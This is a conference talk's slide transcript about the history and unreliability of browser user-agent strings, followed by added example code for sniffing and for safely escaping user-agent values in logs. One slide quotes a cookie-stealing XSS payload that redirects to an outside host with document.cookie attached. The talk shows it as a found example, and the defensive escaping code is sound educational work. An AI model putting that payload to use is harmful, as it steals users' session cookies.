Everybody Lies @ Fronteers Jam Sessions 2016

This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on GitHub still shows millions of lines of code referring to user agent strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.

Niels Leenheer

October 06, 2016

Transcript

  1. the 8 minute version that contains none of that boring shit and just the jokes and weird stuff
    everybody lies
    fronteers conference — jam sessions, october 6th 2016

  2. warning:
    this talk is full of lies and deception

  4. yes…
    this talk is about
    browser sniffing

  5. why?

  6. browser sniffing is dirty

  7. you should use feature detection

  8. Dear Web Developers:
    Browser Sniffing is Stupid
    http://www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

  9. 5 Reasons Why Browser
    Sniffing Stinks
    https://www.sitepoint.com/why-browser-sniffing-stinks/

  10. everybody uses browser sniffing

  12. why…
    is browser sniffing so difficult?

  13. things started out simple

  14. Mosaic/0.9
    Mosaic

  15. Mozilla/1.0 (Win3.1)
    Netscape Navigator
    code name of the browser

  16. but it quickly started to get complicated

  17. Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
    Internet Explorer
    compatible with Netscape Navigator 1.0

  18. Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
    Opera

  19. Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00
    Opera
    real version of the browser

  20. Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5
    Firefox
    build date of the rendering engine

  21. Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0
    Firefox
    build date is no longer updated

  22. Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
    Firefox

  23. and it gets worse…

  24. Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3
    Safari

  25. Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3
    Chrome

  26. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
    Opera

  27. Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Internet Explorer

  28. Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
    Edge

  29. and those were all relatively
    normal user-agent strings

  30. sometimes browsers lie to hide their true identity

  31. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
    Opera

  32. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
    Opera Mobile (desktop mode)
    ROT 13 encrypted “mobi”

  33. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Internet Explorer

  34. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Internet Explorer (compatibility view)
    Trident 5 means it’s Internet Explorer 9

  35. and it is possible to change the
    user-agent string yourself

  36. alert("My Little Pony");
    document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;
    alt="My Little Pony">
    XSS attacks

  37. XSS attacks

  38. (╯°□°)╯︵ ┻━┻
    Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
    funny people

  39. angry people

  40. FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0
    Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62
    Seriously, Go fuck yourself
    W3C standards are important. Stop fucking obsessing over user-agent already.
    angry people

  41. 1.000.000 unique useragent strings

  42. 1.000.000 unique useragent strings
    82 x fuck

  43. 1.000.000 unique useragent strings
    82 x fuck
    6 x ass

  44. 1.000.000 unique useragent strings
    82 x fuck
    6 x ass
    3 x vagina

  45. 1.000.000 unique useragent strings
    82 x fuck
    6 x ass
    3 x vagina
    108 x sex

  46. 1.000.000 unique useragent strings
    82 x fuck
    10 x shit
    6 x ass
    3 x vagina
    108 x sex

  47. 1.000.000 unique useragent strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex

  48. 1.000.000 unique useragent strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex
    4 x balls

  49. user-agent strings cannot be trusted!

  50. everybody lies

  51. you should never
    use browser sniffing for
    controlling access to your website

  52. you should never
    use browser sniffing for
    determining browser
    capabilities

  53. you should never
    build your own browser sniffing library

  55. “If you tell a big enough lie and tell it frequently enough, it will be believed”
    — Gandhi

  57. “If you tell a big enough lie and tell it frequently enough, it will be believed”
    — Adolf Hitler

  58. thank you!
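
The slides on why sniffing is so difficult, run as code. This is an added example, not part of the talk: `naiveSniff`, `misidentified` and `supportsFeature` are hypothetical names, and the sample strings are the user-agent strings quoted in the transcript above.

```javascript
// Added example: a naive substring sniffer run over user-agent strings quoted in the slides.
// Each sample pairs a string from the talk with the browser the slide says sent it.
const samples = [
  ["Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) " +
   "Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180", "Opera"],
  ["Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) " +
   "Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162", "Edge"],
  ["Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", "Internet Explorer"],
  ["Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)", "Internet Explorer 9"],
  ["Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50", "Opera Mobile"],
];

// Hypothetical sniffer (not from the talk): the first matching token wins.
function naiveSniff(ua) {
  if (ua.includes("Chrome/")) return "Chrome";
  if (ua.includes("Safari/")) return "Safari";
  if (ua.includes("Gecko")) return "Firefox";
  const msie = /MSIE (\d+)/.exec(ua);
  if (msie) return "Internet Explorer " + msie[1];
  if (ua.startsWith("Opera/")) return "Opera";
  return "unknown";
}

// ROT13, to decode the "zbov" token in the Opera Mobile desktop-mode string.
function rot13(text) {
  return text.replace(/[a-z]/gi, (ch) => {
    const base = ch <= "Z" ? 65 : 97;
    return String.fromCharCode(((ch.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// Returns every sample where the sniffer's answer differs from the slide's.
function misidentified() {
  return samples
    .map(([ua, actual]) => ({ actual, guessed: naiveSniff(ua) }))
    .filter((row) => row.guessed !== row.actual);
}

// Feature detection asks the runtime directly instead of parsing a claim about it.
function supportsFeature(name, scope = globalThis) {
  return typeof scope[name] !== "undefined";
}

for (const row of misidentified()) {
  console.log(`slide says ${row.actual}, sniffer says ${row.guessed}`);
}
console.log(rot13("zbov"), supportsFeature("JSON"));
```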
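
The XSS slides show user-agent strings carrying script, which matters wherever the header is displayed, such as a log or analytics viewer. The following is an added example, not code from the talk: it encodes the header at output time, `renderLogRow` and `normaliseUserAgent` are hypothetical helpers, and the log entries are constructed.

```javascript
// Added example: treat the User-Agent header as untrusted input when displaying it.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Drop control characters and cap the length before the value is stored or shown.
function normaliseUserAgent(raw, maxLength = 256) {
  return String(raw ?? "").replace(/[\u0000-\u001f\u007f]/g, "").slice(0, maxLength);
}

// Hypothetical row renderer for a server-side access-log viewer.
// The value is used in both element text and a quoted attribute, so it is encoded for both.
function renderLogRow(entry) {
  const ua = escapeHtml(normaliseUserAgent(entry.userAgent));
  return `<tr><td>${escapeHtml(entry.ip)}</td><td title="${ua}">${ua}</td></tr>`;
}

function renderTable(entries) {
  return entries.map(renderLogRow).join("\n");
}

// Constructed log entries (documentation IP range); the first two carry markup
// in the header, the third is an ordinary string from the slides.
const constructedEntries = [
  { ip: "192.0.2.10", userAgent: 'Mozilla/5.0 <script>alert("My Little Pony");</script>' },
  { ip: "192.0.2.11", userAgent: '"><img src=x alt="My Little Pony">' },
  { ip: "192.0.2.12", userAgent: "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0" },
];

console.log(renderTable(constructedEntries));
```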